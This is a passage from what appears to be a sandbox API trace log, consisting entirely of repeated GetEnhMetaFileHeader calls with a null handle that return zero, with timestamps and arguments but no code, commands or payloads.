lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 